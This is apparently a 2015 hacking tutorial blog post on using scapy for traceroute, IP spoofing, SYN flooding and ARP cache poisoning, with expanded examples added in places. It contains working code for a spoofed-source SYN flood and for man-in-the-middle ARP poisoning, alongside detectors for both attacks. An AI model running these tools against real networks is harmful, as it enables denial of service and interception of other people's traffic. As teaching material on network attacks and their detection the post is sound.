Sunday, August 30, 2015

scapy for hacking



Scapy is a Python-based packet crafting tool. It lets you build a complete IP packet field by field, which makes it very useful for the following hacking techniques:

1. IP spoofing.
2. ARP spoofing.
3. SYN flood.
4. Traceroute.

And many other things can be done with this tool.
First we will start with traceroute.

Traceroute.
Traceroute is a tool that traces the route to a particular destination address, that is, the intermediate hops between the source and the destination. In Windows cmd simply type tracert <destination> and it prints a clear picture of the intermediate hops (on Linux the command is traceroute). pathping in cmd gives a more comprehensive view: the hosts between the source and the destination together with the packet loss at each intermediate host.
This tool can be written with the scapy module in Python. Here is how traceroute actually works. Every IP packet has a field called TTL (time to live) which limits how many hops the packet can travel; if the TTL equals 5 it can pass through at most 5 routers. Every router that forwards the packet decrements the TTL by one. When the TTL reaches zero the router discards the packet and sends an ICMP Time Exceeded message (type 11) back to the source. So if we set the TTL of an ICMP echo packet to 2 and send it, the reply comes from the 2nd hop, and the source address of that reply tells us who the 2nd hop is. Repeating this with TTL 1, 2, 3, ... maps the whole path. The following Python code does it for a single TTL value.

#! /usr/bin/python
from scapy.all import IP, ICMP, sr1
# destination and TTL are placeholders; replace with the real target
packet = IP(dst="destination address", ttl=5) / ICMP()
reply = sr1(packet, timeout=2, verbose=0)   # one reply, or None on timeout
if reply is not None:
    print(reply.src)                         # the router at hop 5

This code prints the address of the 5th hop between the source and the destination (the reply is an ICMP Time Exceeded sent by that router). Put the TTL in a loop from 1 upward to list every hop on the path.
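The full TTL-stepping loop, as an added example that is not part of the original post. The hop-discovery logic takes a pluggable probe function, so it runs here against a constructed path (the router addresses and the silent hop are made up) and only touches scapy when you hand it scapy_probe(), which needs root and a network. The stop conditions (ICMP echo reply from the destination, or a destination-unreachable) are the same ones a real traceroute uses.

```python
# Added example (not the original post's code): TTL-stepping traceroute
# whose probing is pluggable, so the hop-discovery logic can run without
# scapy or network access. scapy is imported only inside scapy_probe().
ICMP_ECHO_REPLY = 0
ICMP_DEST_UNREACH = 3
ICMP_TIME_EXCEEDED = 11


def trace_route(dst, probe, max_hops=30):
    """Return a list of (ttl, responder_ip_or_None) from ttl=1 until the
    destination answers (echo reply) or max_hops is reached.

    probe(ttl) must return None on timeout, or a tuple
    (responder_ip, icmp_type) describing the reply that came back.
    """
    hops = []
    for ttl in range(1, max_hops + 1):
        reply = probe(ttl)
        if reply is None:
            hops.append((ttl, None))          # silent hop, printed as '*'
            continue
        responder, icmp_type = reply
        hops.append((ttl, responder))
        # Echo reply means our probe reached the target; Time Exceeded (11)
        # means an intermediate router discarded it and identified itself.
        if responder == dst and icmp_type == ICMP_ECHO_REPLY:
            break
        if icmp_type == ICMP_DEST_UNREACH:   # something refused to forward
            break
    return hops


def simulated_probe(path, dst, silent=()):
    """Build a probe() over a constructed path (list of router addresses),
    modelling TTL decrement: the router at index ttl-1 drops the packet and
    sends ICMP type 11; beyond the last router the destination replies type 0.
    Routers listed in `silent` never answer (firewalls that drop ICMP).
    """
    def probe(ttl):
        if ttl <= len(path):
            router = path[ttl - 1]
            return None if router in silent else (router, ICMP_TIME_EXCEEDED)
        return (dst, ICMP_ECHO_REPLY)
    return probe


def scapy_probe(dst, timeout=2):
    """Real probe using scapy (imported lazily so the module loads without it).
    Needs root. reply.src is the router that generated the ICMP message.
    """
    from scapy.all import IP, ICMP, sr1

    def probe(ttl):
        reply = sr1(IP(dst=dst, ttl=ttl) / ICMP(), timeout=timeout, verbose=0)
        if reply is None:
            return None
        return (reply.src, reply[ICMP].type)
    return probe


def format_hops(hops):
    return "\n".join("%2d  %s" % (ttl, ip or "*") for ttl, ip in hops)


if __name__ == "__main__":
    # Constructed path; swap in scapy_probe("destination address") for a real trace.
    path = ["192.168.1.1", "10.0.0.1", "203.0.113.9"]
    probe = simulated_probe(path, "198.51.100.7", silent=("10.0.0.1",))
    print(format_hops(trace_route("198.51.100.7", probe)))
```

Separating the loop from the I/O is also what makes the logic testable: the silent hop shows up as a `*` line instead of aborting the trace, which is the behaviour you want against a firewall that drops ICMP.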

IP Spoofing.



In this case we change our source IP address. If we change the source IP address, a victim sniffing packets will not see our real IP; it will believe the packet came from a different host. Note that any reply is routed to the spoofed address, not to us, so the packet is sent with send() rather than sr1() (which would wait for an answer that never arrives). Many networks also drop packets whose source address does not belong to them (ingress filtering, BCP 38), so spoofed packets do not always make it out of your own network. In scapy we type the following to achieve this.

scapy
>>> a = IP()
>>> a.src = "desired IP to spoof the victim"
>>> a.dst = "victim IP"
>>> send(a / ICMP())

This is the basis of source address spoofing.
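What assigning a.src actually changes on the wire, as an added example that is not from the original post. The builder below emits the same 20-byte IPv4 header that scapy does for IP(src=..., dst=...); scapy recomputes the header checksum for you, but doing it by hand shows why a spoofed packet is still perfectly valid to every router that forwards it, and why a stale checksum would get the packet dropped. All addresses are constructed; send_spoofed_ping() is the only part that needs scapy and root.

```python
# Added example (not the post's code): the IPv4 header behind IP().src,
# with the checksum recompute that scapy performs when you spoof the source.
import socket
import struct


def ip_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words (odd length is padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src, dst, proto=1, payload_len=0, ttl=64, ident=0):
    """Minimal IPv4 header without options. proto=1 is ICMP."""
    ver_ihl = (4 << 4) | 5
    total_len = 20 + payload_len
    head = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, ident, 0,
                       ttl, proto, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))
    csum = ip_checksum(head)                      # computed with field zeroed
    return head[:10] + struct.pack("!H", csum) + head[12:]


def header_is_valid(header):
    """A receiver's check: summing the header including its checksum gives 0."""
    return ip_checksum(header) == 0


def spoof_source(header, new_src):
    """Rewrite the source address and fix the checksum, as scapy does when
    you assign pkt.src. Without the recompute every router would drop it."""
    patched = header[:12] + socket.inet_aton(new_src) + header[16:]
    zeroed = patched[:10] + b"\x00\x00" + patched[12:]
    return zeroed[:10] + struct.pack("!H", ip_checksum(zeroed)) + zeroed[12:]


def src_of(header):
    return socket.inet_ntoa(header[12:16])


def send_spoofed_ping(spoofed_src, victim):
    """Real send with scapy (imported lazily; needs root). Uses send(), not
    sr1(): the echo reply goes to spoofed_src, so no answer reaches us."""
    from scapy.all import IP, ICMP, send
    send(IP(src=spoofed_src, dst=victim) / ICMP(), verbose=0)


if __name__ == "__main__":
    h = build_ipv4_header("10.0.0.5", "192.0.2.10", payload_len=8)   # constructed
    s = spoof_source(h, "198.51.100.200")
    print(src_of(s), header_is_valid(s))
```

The same header_is_valid() check is what a router performs before forwarding, which is the point: nothing in the IP layer authenticates the source, so only filtering at the network edge (BCP 38) stops the spoofed packet.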

 

SYN Flood.

With a SYN flood we can mount a DoS attack against a server. When a client connects to a server a three-way handshake takes place as follows.
1. --> SYN to server
2. <-- SYN,ACK to client
3. --> ACK to server

For every SYN it receives the server allocates a half-open connection and waits for the final ACK. In a SYN flood we send an enormous number of SYN packets, usually from spoofed source addresses so that the SYN,ACKs go nowhere and the ACKs never arrive, until the server's backlog of half-open connections is full. Once the backlog is full the server refuses further connections. Here is the scapy code.

a = IP(dst="target IP") / TCP(dport=80, flags="S")
send(a, loop=1)     # keep sending until Ctrl-C

This is the basis of a SYN flood. Modern servers use SYN cookies to survive it, so a plain flood is far less effective than it once was, but it is still very visible in the connection counters.
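Both sides of the attack described above, as an added example that is not part of the original post. The attacker half generates SYNs with randomised spoofed sources (the reason the half-open entries linger is that the SYN,ACKs go to hosts that never answer); the defender half flags a flood from a summary of observed segments by the ratio of SYNs to handshake-completing ACKs per service. The target address, ports and the benign traffic are constructed; only scapy_send() needs scapy and root.

```python
# Added example (not the post's code): SYN generation with spoofed sources,
# and the defender-side counter that makes the flood stand out.
import random
from collections import defaultdict


def random_syn(dst, dport, rng=random):
    """Describe one SYN segment as a dict; scapy_send() turns it into packets."""
    return {
        "src": "%d.%d.%d.%d" % tuple(rng.randint(1, 254) for _ in range(4)),
        "dst": dst, "sport": rng.randint(1024, 65535), "dport": dport,
        "seq": rng.randint(0, 0xFFFFFFFF), "flags": "S",
    }


def syn_flood_batch(dst, dport, count, seed=None):
    """count SYNs, each from a fresh random source and port (seed for repeatability)."""
    rng = random.Random(seed)
    return [random_syn(dst, dport, rng) for _ in range(count)]


def scapy_send(batch):
    """Real sender (scapy imported lazily; needs root). sr() would be wrong
    here: we never want to wait for answers that go to spoofed sources."""
    from scapy.all import IP, TCP, send
    pkts = [IP(src=p["src"], dst=p["dst"]) /
            TCP(sport=p["sport"], dport=p["dport"], seq=p["seq"], flags=p["flags"])
            for p in batch]
    send(pkts, verbose=0)


def detect_syn_flood(segments, min_syns=100, max_complete_ratio=0.2):
    """Defender's check over observed client->server segments (dicts with
    src, dst, dport, flags). Returns {(dst, dport): (syns, handshake_acks)}
    for services where few SYNs were followed by the bare ACK that completes
    the handshake. SYN cookies make the flood survivable, not invisible."""
    syns = defaultdict(int)
    acks = defaultdict(int)
    for s in segments:
        key = (s["dst"], s["dport"])
        if s["flags"] == "S":
            syns[key] += 1
        elif s["flags"] == "A":
            acks[key] += 1
    flagged = {}
    for key, n in syns.items():
        if n >= min_syns and acks[key] / float(n) <= max_complete_ratio:
            flagged[key] = (n, acks[key])
    return flagged


def legit_handshakes(dst, dport, count, seed=0):
    """Constructed benign traffic: every SYN is followed by its completing ACK."""
    rng = random.Random(seed)
    out = []
    for _ in range(count):
        syn = random_syn(dst, dport, rng)
        out.append(syn)
        out.append(dict(syn, flags="A"))
    return out


if __name__ == "__main__":
    # Constructed capture: 50 real handshakes to :443 plus a 500-SYN flood on :80.
    traffic = (legit_handshakes("192.0.2.10", 443, 50)
               + syn_flood_batch("192.0.2.10", 80, 500, seed=1))
    print(detect_syn_flood(traffic))     # only (192.0.2.10, 80) is flagged
```

The thresholds are deliberately parameters: a busy web server legitimately sees a few per cent of SYNs that never complete (mobile clients, scanners), so the ratio, not the raw SYN count, is what distinguishes a flood from load.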

ARP Spoofing.

ARP spoofing (ARP cache poisoning) is used to trick the router into forwarding a certain host's packets to you, and the host into sending its own packets to you as well, by sending forged ARP replies. You can look up what ARP spoofing is and which tools exist for it on Google. Here I am going to do ARP spoofing with Python code. The forged replies poison the ARP caches on your network, and the replies to the requests of the chosen host are redirected to you. Enable IP forwarding on your machine first, otherwise the host simply loses its connection instead of being intercepted. Here is the code for ARP spoofing.

from scapy.all import Ether, ARP, sendp

# tell the victim that the router's IP now lives at your MAC address
a = Ether(dst="victim mac address") / ARP(op="is-at", psrc="router ip address", hwsrc="your mac address", pdst="victim ip address", hwdst="victim mac address")
sendp(a)            # layer-2 send; repeat every few seconds so the cache entry does not expire
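The complete poisoning exchange, as an added example that is not part of the original post: the two "is-at" replies a man-in-the-middle sends (victim learns "router is at me", router learns "victim is at me"), the restore frames that put the true mappings back when you are done, and the defender's check that catches it (one IP claimed by more than one MAC). The frames are encoded by hand so every field is visible; all MAC and IP addresses are constructed, and only scapy_send() needs scapy and root.

```python
# Added example (not the post's code): raw ARP "is-at" frames for both
# directions of the poisoning, their undo, and a conflicting-claims detector.
import socket
import struct

ARP_REPLY = 2
ETH_P_ARP = 0x0806


def mac_bytes(mac):
    return bytes(bytearray(int(x, 16) for x in mac.split(":")))


def mac_str(b):
    return ":".join("%02x" % c for c in bytearray(b))


def arp_reply_frame(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP 'is-at' frame telling target_mac that sender_ip lives at
    sender_mac. The Ethernet destination is the target, not broadcast, so only
    the host being poisoned updates its cache."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet/IPv4, is-at
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip)."""
    op = struct.unpack("!H", frame[20:22])[0]
    return (op, mac_str(frame[22:28]), socket.inet_ntoa(frame[28:32]),
            mac_str(frame[32:38]), socket.inet_ntoa(frame[38:42]))


def poison_frames(attacker_mac, victim_mac, victim_ip, router_mac, router_ip):
    """Both directions: victim <- 'router is at attacker', router <- 'victim is at attacker'."""
    return [arp_reply_frame(attacker_mac, router_ip, victim_mac, victim_ip),
            arp_reply_frame(attacker_mac, victim_ip, router_mac, router_ip)]


def restore_frames(victim_mac, victim_ip, router_mac, router_ip):
    """Re-announce the true mappings when done, so the LAN is not left broken."""
    return [arp_reply_frame(router_mac, router_ip, victim_mac, victim_ip),
            arp_reply_frame(victim_mac, victim_ip, router_mac, router_ip)]


def conflicting_claims(frames):
    """Defender's view: map each IP to the MACs that claimed it in replies.
    More than one claimant for an IP is the signature of poisoning."""
    seen = {}
    for f in frames:
        op, smac, sip, _, _ = parse_arp(f)
        if op == ARP_REPLY:
            seen.setdefault(sip, set()).add(smac)
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}


def scapy_send(frames, iface=None):
    """Real sender (scapy imported lazily; needs root). Enable IP forwarding
    first or the victim simply loses its connection."""
    from scapy.all import Ether, sendp
    sendp([Ether(f) for f in frames], iface=iface, verbose=0)


if __name__ == "__main__":
    # Constructed LAN: victim .10, router .1, attacker somewhere in between.
    victim, router, me = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:fe", "de:ad:be:ef:00:01"
    frames = poison_frames(me, victim, "192.168.1.10", router, "192.168.1.1")
    for f in frames:
        print(parse_arp(f))
    print(conflicting_claims(restore_frames(victim, "192.168.1.10", router, "192.168.1.1") + frames))
```

Sending the restore frames on exit matters in practice: cache entries poisoned with your MAC outlive your session, and a victim left pointing at a host that is gone is how a "quiet" test gets noticed.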

These are the things you can do with scapy, and a lot more. Find out and try them.
